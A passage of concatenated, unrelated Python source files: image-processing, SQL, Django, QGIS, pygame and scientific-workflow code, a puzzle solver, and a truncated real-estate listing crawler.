self.connect( itk.ChangeInformationImageFilter[ImageType].New( ChangeSpacing=True ) )
# and configure the pipeline
if fileName:
self.SetFileName( fileName )
self.SetChannel( channel )
def SetFileName( self, fileName ):
self[0].SetFileName( fileName )
self[0].Update()
self.UpdateSpacing()
self[-1].UpdateLargestPossibleRegion()
def SetChannel( self, channel ):
self[0].SetUpdateChannel( channel )
self[0].Update()
self.UpdateSpacing()
self.__channel__ = channel
self[-1].UpdateLargestPossibleRegion()
return self.GetChannelName( channel )
def UpdateSpacing(self):
spacing = self[0].GetVoxelSizes()
spacing = [ v * 1e6 for v in spacing ]
self[-1].SetOutputSpacing( spacing )
def GetFileName(self):
return self[0].GetFileName()
def GetChannel(self):
return self.__channel__
def GetNumberOfChannels(self):
return self[0].GetNumberOfChannels()
def GetChannelName(self, channel=None):
if channel == None:
channel = self.GetChannel()
return self[0].GetChannelName( channel )
del itkExtras
|
from .client import AlchemyClient, AlchemyDialect
from .database import AlchemyDatabase, AlchemyDatabaseSchema, AlchemyTable
from .datatypes import schema_from_table, table_from_schema, to_sqla_type
from .query_builder import AlchemyQueryBuilder, build_ast, to_sqlalchemy
from .registry import (
fixed_arity,
get_sqla_table,
infix_op,
reduction,
sqlalchemy_operation_registry,
sqlalchemy_window_functions_registry,
unary,
varargs,
variance_reduction,
)
from .translator import AlchemyContext, AlchemyExprTranslator
__all__ = (
'AlchemyExprTranslator',
'AlchemyContext',
'AlchemyQueryBuilder',
'AlchemyDialect',
'AlchemyClient',
'AlchemyTable',
'AlchemyDatabaseSchema',
'AlchemyDatabase',
'AlchemyContext',
'sqlalchemy_operation_registry',
'sqlalchemy_window_functions_registry',
'reduction',
'variance_reduction',
'fixed_arity',
'unary',
'infix_op',
'get_sqla_table',
'to_sqla_type',
'schema_from_table',
'table_from_schema',
'varargs',
'to_sqlalchemy',
'build_ast',
)
|
import logging
import os
import random
import re
from logrec.dataprep.split.samecase.splitter import load_english_dict
logger = logging.getLogger(__name__)
class LanguageChecker(object):
DEFAULT_MIN_CHARS_TO_BE_NON_ENG = 4
def __init__(self, path_to_general_english_dict, path_to_non_eng_dicts):
logger.info("Loading english dictionary")
english_general_dict = load_english_dict(path_to_general_english_dict)
logger.info("Loading non-english dictionaries")
self.non_eng_word_set = self.__create_non_eng_word_set(path_to_non_eng_dicts, english_general_dict,
LanguageChecker.DEFAULT_MIN_CHARS_TO_BE_NON_ENG)
def in_non_eng_word_set(self, word):
return word in self.non_eng_word_set
def is_non_eng(self, word):
return not self.__isascii(word) or self.in_non_eng_word_set(word.lower())
def calc_lang_stats(self, word_list, include_sample=False):
non_eng_unique = set()
non_eng = 0
for word in word_list:
if self.is_non_eng(word):
non_eng += 1
non_eng_unique.add(word)
total = len(word_list)
total_uq = len(set(word_list))
non_eng_uq = len(non_eng_unique)
result = total, total_uq, non_eng, non_eng_uq \
, float(non_eng) / total if total != 0 else 0 \
, float(non_eng_uq) / total_uq if total_uq != 0 else 0
if include_sample:
result = (*result, ",".join(random.sample(non_eng_unique, min(len(non_eng_unique), 15))))
return result
def __create_non_eng_word_set(self, dicts_dir, english_dict, min_chars):
dict_files_names = [f for f in os.listdir(dicts_dir)]
non_eng_words = set()
for dict_file_name in dict_files_names:
with open(os.path.join(dicts_dir, dict_file_name), 'r') as f:
for line in f:
word = re.split("[/\t]", line)[0] # splitting by tabs and slashes
word = word.lower()
if word[-1] == '\n':
word = word[:-1]
if word not in english_dict and len(word) >= min_chars:
non_eng_words.add(word)
return non_eng_words
def __isascii(self, str):
try:
str.encode('ascii')
return True
except UnicodeEncodeError:
return False
|
# Generated by Django 3.1.6 on 2021-02-19 12:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0006_auto_20210219_1215'),
]
operations = [
migrations.CreateModel(
name='OurTeam',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=255)),
('designation', models.CharField(default=None, max_length=50, null=True)),
('profile_pic', models.CharField(max_length=1000, null=True)),
('facebook_url', models.CharField(max_length=1000, null=True)),
('tweet_url', models.CharField(max_length=1000, null=True)),
('created_date', models.DateTimeField(auto_now_add=True)),
],
options={
'db_table': 'our_team',
'managed': True,
},
),
]
|
def regras(x):
if x < 100:
if x % 2 == 0:
return x
else:
return (x + x)
lista = [100, 200, 1000, 3000, 2, 3, 4, 5, 6, 7, 8]
print(list(filter(regras,lista)))
#https://pt.stackoverflow.com/q/321682/101
|
import re
# import time
import datetime
def to_list(file):
f = open(file, 'rt', encoding = 'UTF-8')
lines = f.readlines()
return lines
w_punct = to_list('broadcast_w_punct_u_double.txt')
backup = w_punct
f = open('SubtTV_2017_01_03_pcm.list.trn', 'rt', encoding = 'UTF-8')
new_f = open('SubtTV_2017_01_03_pcm.list.punct.trn', 'wt', encoding = 'UTF-8')
not_found = open('SubtTV_2017_not_found', 'wt', encoding = 'UTF-8')
print(datetime.datetime.now())
while True:
# counter = time.time()
line = f.readline()
if not line : break
file_name = line.split(' :: ')[0]
org_txt = line.split(' :: ')[1][:-1]
flag = True
org_txt_sub = re.sub('[ ]', '', org_txt)
first_word = org_txt.split(' ')[0]
second_word = org_txt.split(' ')[-1]
# print('org : ', org_line_sub)
for cmp_line in w_punct:
cmp_txt = cmp_line[:-1]
cmp_txt_sub = re.sub('[,.?!~ ]', '', cmp_txt)
# print('cmp : ', cmp_line_sub)
if org_txt_sub in cmp_txt_sub:
start = cmp_txt.find(first_word)
check = cmp_txt.find(second_word, start + len(first_word))
end = cmp_txt.find(' ', check)
if end == -1:
new_f.write(file_name + ' :: ' + cmp_txt[start:] + '\n')
else:
new_f.write(file_name + ' :: ' + cmp_txt[start:end] + '\n')
flag = False
# print('done : ', time.time() - counter)
w_punct = w_punct[w_punct.index(cmp_line)+1:]
break
if flag:
not_found.write(line)
w_punct = backup
# print('fail : ', time.time() - counter) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
logger.addHandler(logging.NullHandler())
from . import exceptions
from .agent import Agent
from .constants import ValueType
from .mib import MIBMeta, MIBUpdater, MIBEntry, ContextualMIBEntry, SubtreeMIBEntry
|
from Operators.ExampleTextRecognizeOperator.TextRecognizeOperator import GeneralCRNN
|
import math
import sys
import itertools as it
import warnings
import re
from collections import OrderedDict
import data_IO
def readCases(paramsFile, namesdelimiter=";", valsdelimiter="_",
paramsdelimiter = "\n", withParamType = True):
with open(paramsFile) as f:
content = f.read().split(paramsdelimiter)
if content[-1] == "\n":
del content[-1]
# Replace non-ascii characters with space
content = data_IO.remove_non_ascii_list(content)
pvals = OrderedDict({})
pTypes = OrderedDict({})
for x in content:
if "null" not in x and x != "":
pname = x.split(namesdelimiter)[0]
if withParamType:
pType = x.split(namesdelimiter)[1]
pval = x.split(namesdelimiter)[2]
else:
pval = x.split(namesdelimiter)[1]
pval = data_IO.parse_pval(pval)
pvals[pname] = pval
if withParamType:
pTypes[pname] = pType
else:
pTypes[pname] = None
varNames = list(pvals.keys())
#
cases = [[{varName: val} for varName, val in zip(varNames, prod)] for prod in
it.product(*(pvals[varName] for varName in varNames))]
return cases, varNames, pTypes
def correct_input_variable_names(cases):
all_cases_corrected = []
for case in cases:
corrected_case = []
for param_val_pair in case:
param_name = next(iter(param_val_pair))
param_name_corrected = param_name.replace(',', '_')
param_name_corrected = param_name_corrected.replace('.', '_')
param_name_corrected = param_name_corrected.replace('(', '_')
param_name_corrected = param_name_corrected.replace(')', '_')
param_name_corrected = param_name_corrected.replace('[', '_')
param_name_corrected = param_name_corrected.replace(']', '_')
param_name_corrected = param_name_corrected.replace(':', '')
param_name_corrected = param_name_corrected.replace('/', '_div_')
param_val_pair[param_name_corrected] = param_val_pair.pop(param_name)
corrected_case.append(param_val_pair)
all_cases_corrected.append(corrected_case)
return all_cases_corrected
def generate_caselist(cases, pnameValDelimiter='=', paramValPairDelimiter=","):
caselist = []
for c in cases:
case = ""
for p in c:
pname = list(p.keys())[0]
pval = p[pname]
case += pname + pnameValDelimiter + pval + paramValPairDelimiter
caselist.append(case[:-1])
return caselist
def getParamTypeFromfileAddress(dataFileAddress):
if dataFileAddress.endswith('.run'):
paramsType = 'paramFile'
elif dataFileAddress.endswith('.list'):
paramsType = 'listFile'
else:
print('Error: parameter/case type cannot be set. Please provide .list or .run file. ')
sys.exit(1)
return paramsType
def readcasesfromcsv(casesFile,paramValDelim=',', paramPairDelim = ','):
f = open(casesFile, "r")
cases = []
for i, line in enumerate(f):
# First split all the parameters and values:
data = []
for paramValPair in line.split(paramPairDelim):
data.extend(l.replace("\n", "") for l in paramValPair.split(paramValDelim))
# Combine the parameter labels and their values:
span = 2
data = [paramValDelim.join(data[i:i+span]) for i in range(0, len(data), span)]
case = []
for ii, v in enumerate(data):
param = {v.split(paramValDelim)[0]: v.split(paramValDelim)[1]}
case.append(param)
cases.append(case)
f.close()
return cases
def readParamsFile(paramsFile, paramValDelim=',', paramPairDelim=','):
paramsFileType = getParamTypeFromfileAddress(paramsFile)
if paramsFileType == 'paramFile':
cases = readCases(paramsFile)
else:
cases = readcasesfromcsv(paramsFile, paramValDelim, paramPairDelim)
return cases
def generateHeader(inputParamNames, outParamTables, outImgList):
num2statTable = {0:'ave', 1:'min', 2:'max', 3:'sd'}
header = []
for varName in inputParamNames:
header += "in:" + varName + ","
header = "".join(header[:-1])
for paramNameStat in outParamTables:
outStr = ",out:" + paramNameStat[0]
if paramNameStat[1] >= 0:
outStr += "_" + num2statTable[paramNameStat[1]]
header += outStr
for imgName in outImgList:
header += ",img:" + imgName
return header
def convertListOfDicts2Dict(listOfDicts):
"""
Convert the list of dictionaries (per parameter/value pair) from a case"
into a single dictionary
"""
result = {}
for d in listOfDicts:
result.update(d)
return result
def getParamNamesFromCase(case):
result = convertListOfDicts2Dict(case)
inputVarNames = sorted(result)
return inputVarNames
def writeInputParamVals2caselist(cases, inputVarNames):
"""
Add the values of input parameters for each case to caselist
"""
caselist = []
for c in cases:
case = ""
cDict = convertListOfDicts2Dict(c)
for pname in inputVarNames:
pval = cDict[pname]
case += pval + ","
caselist.append(case[:-1])
return caselist
def genOutputLookupTable(outParamsList):
lookupTable = []
stat2numTable = {'ave': 0, 'min': 1, 'max': 2, 'sd': 3}
for param in outParamsList:
if param.find("(") > 0:
paramName = param[:param.find("(")]
paramName = paramName.lstrip()
statStr = param[param.find("(")+1:param.find(")")]
statKey = stat2numTable[statStr.lower()]
lookupTable.append([paramName, statKey])
else:
lookupTable.append([param, -1])
return lookupTable
def parseOutputType(statStr, isParaviewMetric):
statList = []
statStrList = [x.strip().lower() for x in statStr.split(",")]
stat2numTable = OrderedDict([('ave', 0), ('min', 1), ('max', 2), ('sd', 3)])
if statStrList[0].lower() in {"none", "image"}:
return statList
elif statStrList[0] == "all":
statStrList = list(stat2numTable.keys())
for statStr in statStrList:
if isParaviewMetric:
if statStr in stat2numTable:
statList.append(stat2numTable[statStr])
else:
warningMsg = 'Please check the format of stat flag ' \
'("{}" is not acceptable for Paraview metrics). ' \
'Accepted values are: "none", "image", "all", "{}". ' \
'Setting stat flag to "none". ' \
.format(statStr, '", "'.join(list(stat2numTable.keys())))
warnings.warn(warningMsg)
else:
statList.append(-1)
return statList
def getOutputParamsFromKPI(kpihash, orderPreservedKeys, ignoreSet):
outputParams= []
lookupTable = []
for kpi in orderPreservedKeys:
if kpi not in ignoreSet:
metrichash = kpihash[kpi]
if data_IO.str2bool(metrichash['IsParaviewMetric']):
if not data_IO.str2bool(metrichash['extractStats']):
continue
outputTypeList = parseOutputType(metrichash['DEXoutputFlag'],
data_IO.str2bool(metrichash['IsParaviewMetric']))
for outputType in outputTypeList:
outputParams.append(kpi)
lookupTable.append([kpi, outputType])
return lookupTable
def getOutImgsFromKPI(kpihash, orderPreservedKeys):
imgTitles= []
imgNames = []
for kpi in orderPreservedKeys:
metrichash = kpihash[kpi]
isParaviewMetric = data_IO.str2bool(metrichash["IsParaviewMetric"])
if not (isParaviewMetric or metrichash['DEXoutputFlag'].lower() == "image"):
continue
imageName = metrichash['imageName']
if imageName != "None":
imgTitles.append(kpi)
imgNames.append(imageName)
animation = data_IO.str2bool(metrichash['animation'])
if animation:
imgTitles.append(kpi+'_animation')
imgNames.append(metrichash['animationName'])
return imgTitles, imgNames
def getOutputParamsStatListOld(outputParamsFileAddress, outputParamNames,
stats2include=['ave', 'min', 'max']):
# If the outputParamsFileAddress exists, read the output variables and their desired stats from file
if outputParamsFileAddress:
foutParams = data_IO.open_file(outputParamsFileAddress, 'r')
allDesiredOutputs = foutParams.read()
allDesiredOutputs = allDesiredOutputs.splitlines()
# First get the name of parameters to read from metric extraction csv files
outParamsFromCSV = allDesiredOutputs[0]
outParamsFromCSV = outParamsFromCSV.split(',')
# Make sure all the varialbes in outputParamsList exist in outputParamNames:
outParamsList_existIncsv = []
for param in outParamsFromCSV:
paramName = param[:param.find("(")]
if paramName in outputParamNames:
outParamsList_existIncsv.append(param)
outParamsList = outParamsList_existIncsv
# Read parameters from other files if provided
# The format is:
# outputName;outputFileNameTemplate;outputFlag;delimitor;locationInFile
#
# For example:
# pressure_drop;results/case_{:d}_pressure_drop.txt;;" ";1
#
outParamsFromOtherFiles = []
for line in allDesiredOutputs[1:]:
if line:
outputReadParams = line.split(";")
outParamsFromOtherFiles.append(outputReadParams[0])
outParamsList.extend(outParamsFromOtherFiles)
else:
outParamsList =[]
for paramName in outputParamNames:
for stat in stats2include:
outParamsList.append(paramName+"("+stat+")")
return outParamsList
def readOutParamsForCase(paramTable, csvTemplateName, caseNumber, kpihash,
add_sim_status_param=False):
outParamsList = []
# Read values from the Metrics Extraction file first
readMEXCSVFile = False
if any(param[1] >= 0 for param in paramTable):
readMEXCSVFile = True
if readMEXCSVFile:
PVcsvAddress = csvTemplateName.format(caseNumber)
solution_converged = True
for param in paramTable:
if param[1] >= 0: # Read the parameters from a Mex (Paraview) .csv file
try:
fPVcsv = data_IO.open_file(PVcsvAddress, 'r')
param_icase = data_IO.read_float_from_file_pointer(
fPVcsv, param[0], ',', param[1])
fPVcsv.close()
except (IOError, ValueError):
print('Error reading {} from file {}. Setting value to '
'NaN'.format(param[0], PVcsvAddress))
solution_converged = False
param_icase = float('NaN')
elif param[1] == -1: # Read parameters from other files if provided
metrichash = kpihash[param[0]]
dataFile = metrichash['resultFile'].format(caseNumber)
dataFileParamFlag = metrichash['DEXoutputFlag']
dataFileDelimiter = metrichash['delimiter']
if not dataFileDelimiter:
dataFileDelimiter = None
locnInOutFile = int(metrichash['locationInFile']) - 1
# Start from 0
try:
fdataFile = data_IO.open_file(dataFile, 'r')
param_icase = data_IO.read_float_from_file_pointer(
fdataFile, dataFileParamFlag, dataFileDelimiter, locnInOutFile)
fdataFile.close()
except (IOError, ValueError):
print('Error reading {} from file {}. Setting value to '
'NaN'.format(dataFileParamFlag,dataFile))
solution_converged = False
param_icase = float('NaN')
elif param[1] == -2: # This is for outputting simulation status
continue
outParamsList.append(str(param_icase))
if add_sim_status_param:
if solution_converged:
outParamsList.append(str(1))
else:
outParamsList.append(str(0))
return outParamsList
def writeOutParamVals2caselist(cases, csvTemplateName, paramTable, caselist, kpihash):
# Read the desired metric from output file(s) for each case
for icase, case in enumerate(cases):
outparamList = readOutParamsForCase(paramTable, csvTemplateName,
icase, kpihash,
add_sim_status_param=True)
caselist[icase] += "," + ",".join(outparamList)
return caselist
def writeImgs2caselist(cases, imgNames, basePath, pngsDirRel2BasePath, caselist):
for icase, case in enumerate(cases):
caseOutStr = ""
for imageNameTemplate in imgNames:
imageName = imageNameTemplate.format(icase)
caseOutStr += "," + basePath + pngsDirRel2BasePath.format(icase) +\
imageName.format(icase)
caselist[icase] += caseOutStr
return caselist
def writeDesignExplorerCSVfile(deCSVFile, header, caselist):
f = data_IO.open_file(deCSVFile, 'w')
f.write(header + '\n')
casel = "\n".join(caselist)
f.write(casel + '\n')
f.close()
def mergeParamTypesParamValsDict(paramTypes, paramVals):
paramsTypeVal = {}
for param in paramTypes:
paramsTypeVal[param] = {'value':paramVals[param], 'type':paramTypes[param]}
return paramsTypeVal
def merge_cases(case_1, case_2):
merged_cases = []
for i in it.product(case_1,case_2):
merged_cases.append(i[0]+i[1])
return merged_cases
def writeXMLPWfile_old(case, paramTypes, xmlFile, helpStr = 'Whitespace delimited or range/step (e.g. min:max:step)',
paramUnits=[]):
"""Write the input section of the xml file for generating input forms on the Parallel Works platform"""
paramVals = convertListOfDicts2Dict(case)
# sort the keys by parameter types:
paramsBytype = {}
paramsSortedBytype = sorted(paramTypes.items())
paramsTypeVal = mergeParamTypesParamValsDict(paramTypes, paramVals)
paramsTypeVal = OrderedDict(sorted(paramsTypeVal.items()))
print(list(paramVals.keys()))
unitStr = ""
f = data_IO.open_file(xmlFile, "w")
# Write the xml file header:
f.write("<tool id=\'test_params_forms\' name=\'test_params_forms\'> \n"
"\t<command interpreter=\'swift\'>main.swift</command> \n"
"\t<inputs> \n")
paramTypes = set(paramTypes.values())
# Write the parameters of each type under a section
expanded = 'true'
for sectionName in paramTypes:
# Write the section header
# e.g. <section name='design_space' type='section' title='Cyclone Geometry Parameter Space' expanded='true'>
f.write("\t\t<section name=\'" + sectionName + "\' type=\'section\' title='" +
sectionName.capitalize() +" Parameters\' expanded=\'" + expanded + "\'> \n")
expanded = 'false'
for paramName in paramsTypeVal:
paramDict = paramsTypeVal[paramName]
if paramUnits:
if paramUnits[paramName]:
unitStr = " (" + paramUnits[paramName] + ")"
else:
unitStr = ""
if paramDict['type'] == sectionName:
pVal = paramDict['value']
paramLabel = re.sub(r"(\w)([A-Z])", r"\1 \2", paramName)
paramLabel = data_IO.upperfirst(paramLabel)
f.write("\t\t\t<param name=\'"+ paramName + "\' type=\'text\' value=\'" + str(pVal) +
"\' label=\'" + paramLabel + unitStr +"\' help=\'" + helpStr + "\' width=\'33.3%\' argument=\'"
+ sectionName + "\'>\n")
f.write("\t\t\t</param>\n")
f.write("\t\t</section> \n")
f.write("\t</inputs> \n")
f.write("</tool> \n")
f.close()
return paramsBytype
def writeXMLPWfile(sample_case, param_types, xml_file,
help_text='Whitespace delimited or range/step (e.g. min:max:step)',
user_name='user',
workflow_name='workflow',
swift_script='main.swift'):
import input_form
from lxml import etree
param_values = convertListOfDicts2Dict(sample_case)
# Convert empty parameter strings to None
for key, value in param_types.items():
if not value:
param_types[key] = None
# Create an input object
inp = input_form.Inputs()
for param_name, value in param_values.items():
param = input_form.Param(param_name, value, 'text',
section_name=param_types[param_name],
help_text=help_text)
inp.add_param(param)
# Create the xml
form = input_form.create_form_xml(tool_name=user_name+'_'+workflow_name,
swift_script=swift_script)
# add the input element to the xml
form_input = etree.SubElement(form, "inputs")
for param in inp.params:
param.add_to_xml(form_input)
for section_name, section in inp.sections.items():
s = section.add_to_xml(form_input)
for ip in section.params:
ip.add_to_xml(s)
# add a place holder for specifying workflow outputs
outs = etree.SubElement(form, "outputs")
data = etree.SubElement(outs, "data")
data.set('name','output')
data.set('type', 'data')
data.set('format', 'txt')
data.set('label', 'output.txt')
print(etree.tostring(form, pretty_print=True).decode('utf-8'))
fxml = data_IO.open_file(xml_file, "w")
fxml.write(etree.tostring(form, pretty_print=True).decode('utf-8'))
fxml.close()
|
'Computer vision as a Service - Python Client'
from setuptools import setup
setup(
name='cvas',
version='1.1.28',
description='Computer Vision as a Service Python Client',
long_description='Computer Vision as a Service Python Client.',
license='MIT',
author='Adam Jez',
author_email='adamjez@outlook.cz',
packages=['cvas'],
install_requires=[
'requests',
'json',
'tempfile'
]
)
|
# BOJ 11559
import sys
from collections import deque
si = sys.stdin.readline
dx = [-1, 1, 0, 0]
dy = [0, 0, -1, 1]
def bfs(init_y: int, init_x: int, c: int) -> list:
que = deque()
vector = []
que.append((init_y, init_x))
visited[init_y][init_x] = True
vector.append((init_y, init_x))
while que:
y, x = que.popleft()
for i in range(4):
nx = x + dx[i]
ny = y + dy[i]
if ny < 0 or ny >= 12 or nx < 0 or nx >= 6:
continue
if not visited[ny][nx] and graph[ny][nx] == c:
visited[ny][nx] = True
que.append((ny, nx))
vector.append((ny, nx))
return vector
def has_to_remove(vector: list) -> bool:
size = len(vector)
flag = False
if size >= 4:
flag = True
for y, x in vector:
graph[y][x] = 0
return flag
def block_down():
for y in range(11, 0, -1):
for x in range(6):
if graph[y][x] == 0:
for k in range(y, -1, -1):
if graph[k][x] > 0:
graph[y][x], graph[k][x] = graph[k][x], graph[y][x]
break
def transform(el):
if el == ".":
el = 0
elif el == "R":
el = 1
elif el == "G":
el = 2
elif el == "B":
el = 3
elif el == "P":
el = 4
elif el == "Y":
el = 5
return el
# graph = []
# for _ in range(12):
# temp = list(si().strip())
# transformed = list(map(transform, temp))
# graph.append(transformed)
graph = [[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 5, 0, 0, 0, 0],
[0, 5, 2, 0, 0, 0],
[1, 1, 5, 2, 0, 0], [1, 1, 5, 2, 2, 0]]
chain = 0
while True:
visited = [[False for _ in range(6)] for _ in range(12)]
passed = []
again = False
for i in range(12):
for j in range(6):
if not visited[i][j] and graph[i][j] > 0:
passed = bfs(i, j, graph[i][j])
if has_to_remove(passed):
again = True
if not again:
break
block_down()
chain += 1
for i in range(12):
print(" ".join(list(map(str, graph[i]))))
print(chain)
|
import pygame
class Tile(pygame.sprite.Sprite):
def __init__(self,pos,size):
super().__init__()
self.image = pygame.Surface((size,size))
self.image.fill('grey')
self.rect = self.image.get_rect(topleft = pos)
def update(self,x_shift):
self.rect.x += x_shift |
from qgis.core import *
from qgis.gui import *
from PyQt4.QtGui import *
from PyQt4.QtCore import *
class CrossSymbolLayer(QgsMarkerSymbolLayerV2):
def __init__(self, length=10.0, width=2.0):
QgsMarkerSymbolLayerV2.__init__(self)
self.length = length
self.width = width
def layerType(self):
return "Cross"
def properties(self):
return {'length' : self.length,
'width' : self.width}
def clone(self):
return CrossSymbolLayer(self.length,
self.width)
def startRender(self, context):
self.pen = QPen()
self.pen.setWidth(self.width)
def stopRender(self, context):
self.pen = None
def renderPoint(self, point, context):
left = point.x() - self.length
right = point.x() + self.length
bottom = point.y() - self.length
top = point.y() + self.length
if context.selected():
self.pen.setColor(context.selectionColor())
else:
self.pen.setColor(self.color())
painter = context.renderContext().painter()
painter.setPen(self.pen)
painter.drawLine(left, bottom, right, top)
painter.drawLine(right, bottom, left, top)
class CrossSymbolLayerWidget(QgsSymbolLayerV2Widget):
def __init__(self, parent=None):
QgsSymbolLayerV2Widget.__init__(self, parent)
self.layer = None
self.lengthField = QSpinBox(self)
self.lengthField.setMinimum(1)
self.lengthField.setMaximum(100)
self.connect(self.lengthField,
SIGNAL("valueChanged(int)"),
self.lengthChanged)
self.widthField = QSpinBox(self)
self.widthField.setMinimum(1)
self.widthField.setMaximum(100)
self.connect(self.widthField,
SIGNAL("valueChanged(int)"),
self.widthChanged)
self.form = QFormLayout()
self.form.addRow("Length", self.lengthField)
self.form.addRow("Width", self.widthField)
self.setLayout(self.form)
def setSymbolLayer(self, layer):
if layer.layerType() == "Cross":
self.layer = layer
self.lengthField.setValue(layer.length)
self.widthField.setValue(layer.width)
def symbolLayer(self):
return self.layer
def lengthChanged(self, n):
self.layer.length = n
self.emit(SIGNAL("changed()"))
def widthChanged(self, n):
self.layer.width = n
self.emit(SIGNAL("changed()"))
class CrossSymbolLayerMetadata(QgsSymbolLayerV2AbstractMetadata):
def __init__(self):
QgsSymbolLayerV2AbstractMetadata.__init__(self,
"Cross",
"Cross Marker",
QgsSymbolV2.Marker)
def createSymbolLayer(self, properties):
if "length" in properties:
length = int(properties['length'])
else:
length = 10
if "width" in properties:
width = int(properties['width'])
else:
width = 2
return CrossSymbolLayer(length, width)
def createSymbolLayerWidget(self, layer):
return CrossSymbolLayerWidget()
registry = QgsSymbolLayerV2Registry.instance()
registry.addSymbolLayerType(CrossSymbolLayerMetadata())
|
import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler
df=pd.read_csv("039.csv")
# print(df)
scalar=StandardScaler()
scalar.fit(df)
df_scaled=scalar.transform(df)
print(df_scaled)
|
# Copyright 2019 ETH Zurich, Lukas Cavigelli and Georg Rutishauser
# Copyright and related rights are licensed under the Solderpad Hardware
# License, Version 0.51 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://solderpad.org/licenses/SHL-0.51. Unless required by applicable law
# or agreed to in writing, software, hardware and materials distributed under
# this License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
from stimuli_params import StimuliParams
import random
import numpy as np
import torch
torch.manual_seed(220)
random.seed(9)
np.random.seed(62)
FM_FRAC = 0.05
BATCH_SIZE = 1
N_BATCH = 4
DATA_W = 8
LOG_MAX_WORDS = 24
MAX_ZRLE_LEN = 16
BLOCK_SIZE = 8
#Adjust these to your needs - it's recommended to use absolute paths.
BASE_STIM_DIRECTORY = '/home/georgr/projects/stream-ebpc/simvectors'
DATASET_PATH = '/usr/scratch2/risa/georgr/imagenet/imgs'
DEBUG_FILE = None
SAFETY_FAC = 0.75
MODULES = ['encoder', 'decoder']
#NETS = ['vgg16', 'resnet34', 'mobilenet2', 'random', 'all_zeros']
#NETS = ['vgg16', 'resnet34']
NETS = ['resnet34']
#NETS = ['last_test']
#NETS = ['random', 'all_zeros']
#import pydevd_pycharm
#pydevd_pycharm.settrace('risa', port=9100, stdoutToServer=True, stderrToServer=True)
stims = []
for net in NETS:
dbg_f = DEBUG_FILE if net == 'vgg16' else None
stims.append(StimuliParams(network=net, fm_frac=FM_FRAC,
batch_size=BATCH_SIZE, modules=MODULES, n_batches=N_BATCH, data_w=DATA_W,
max_zrle_len=MAX_ZRLE_LEN, block_size=BLOCK_SIZE,
dataset_path=DATASET_PATH, num_words_width=LOG_MAX_WORDS,
debug_file=dbg_f, safety_factor=SAFETY_FAC))
for stim in stims:
stim.write(BASE_STIM_DIRECTORY)
|
#coding=UTF-8
'''
Created on 2011-7-6
@author: Administrator
'''
from urlparse import urlparse
import cookielib
from pyquery.pyquery import PyQuery #@UnresolvedImport
import re
import datetime #@UnusedImport
import urllib2
from lxml import etree #@UnresolvedImport
from lxml.cssselect import CSSSelector #@UnresolvedImport
import simplejson as js #@UnusedImport @UnresolvedImport
from config import housetype, checkPath, makePath,fitment,toward,deposit, isDEV,\
citynameDict_sf, getDefaultVal
import threading
from BeautifulSoup import BeautifulSoup #@UnresolvedImport
import time
import gc
from jjrlog import msglogger, LinkLog
from common import postHost
homepath="F:\\home\\spider\\"
gc.enable()
class LinkCrawl(object):
def __init__(self,citycode="",kind="",upc="5",st="3"):
cj = cookielib.MozillaCookieJar()
self.br=urllib2.build_opener(urllib2.HTTPHandler(),urllib2.HTTPCookieProcessor(cj),urllib2.HTTPRedirectHandler())
self.header={
"User-Agent":'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; .NET CLR 3.5.30729)',
}
self.upc=upc
self.endtime=str(datetime.date.today() -datetime.timedelta(days=1))
self.clinks=[]
self.pn=[]
self.citycode=citycode
self.baseUrl="http://%s.ganji.com"%self.citycode
self.kind=kind
if kind=="1":#出售
self.urlpath="/fang5/a1u2%s/"
self.folder="sell\\"
elif kind=="2":#出租
self.urlpath="/fang1/u2%s/"
self.folder="rent\\"
elif kind=="3":#求购
self.urlpath="/fang4/u2f0/a1%s/"
self.folder="buy\\"
elif kind=="4":#求租
self.urlpath="/fang2/u2f0/a1%s/"
self.folder="req\\"
def __getAllNeedLinks(self):
cond=True
idx=0
checkit="0"
while cond:
url=self.baseUrl+self.urlpath%("f"+str(idx*32))
#url="http://gz.ganji.com/fang2/u2f0/a1f768/"
# print url
try:
req=urllib2.Request(url, None, self.header)
p=self.br.open(req).read()
except:
continue
else:
check=PyQuery(p)("ul.pageLink li a.c").text()
if check==None or check==checkit:
cond=False
break
else:
checkit=check
links=PyQuery(p)("div.list dl")
p=None
# print len(links)
for link in links:
lk=self.baseUrl+PyQuery(link)(" a.list_title").attr("href")
# print lk
if self.kind=="3" or self.kind=="4":
tm=PyQuery(link)("dd span.time").text()
if re.match('''\d{2}-\d{2}''', tm):
Y=int(time.strftime('%Y', time.localtime()))
tm="%s-%s"%(Y,tm.strip())
if tm<self.endtime:
cond=False
break
elif "分钟" in tm:
pass
elif "小时" in tm:
pass
else:
cond=False
break
if not checkPath(homepath,self.folder,lk):
LinkLog.info("%s|%s"%(self.kind,lk))
try:
getContent(lk,self.citycode,self.kind,self.upc)
except Exception,e:print "ganji getContent Exception %s"%e
# fetch_quere.put({"mod":"ganji","link":lk,"citycode":self.citycode,"kind":self.kind})
# if lk not in self.clinks:
# self.clinks.append(lk)
idx=idx+1
# print len(self.clinks)
def runme(self):
#self.__initPageNum()
self.__getAllNeedLinks()
class ContentCrawl(object):
def __init__(self,links,citycode,kind,upc):
cj = cookielib.MozillaCookieJar()
self.br=urllib2.build_opener(urllib2.HTTPHandler(),urllib2.HTTPCookieProcessor(cj),urllib2.HTTPRedirectHandler())
self.pdb={}
self.header={
"User-Agent":'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; .NET CLR 3.5.30729)',
}
self.urls=links
self.kind=kind
self.fd={}
self.citycode=citycode
self.upc=upc
if kind=="1":
self.folder="sell\\"
elif kind=="2":
self.folder="rent\\"
elif kind=="3":
self.folder="buy\\"
else:
self.folder="req\\"
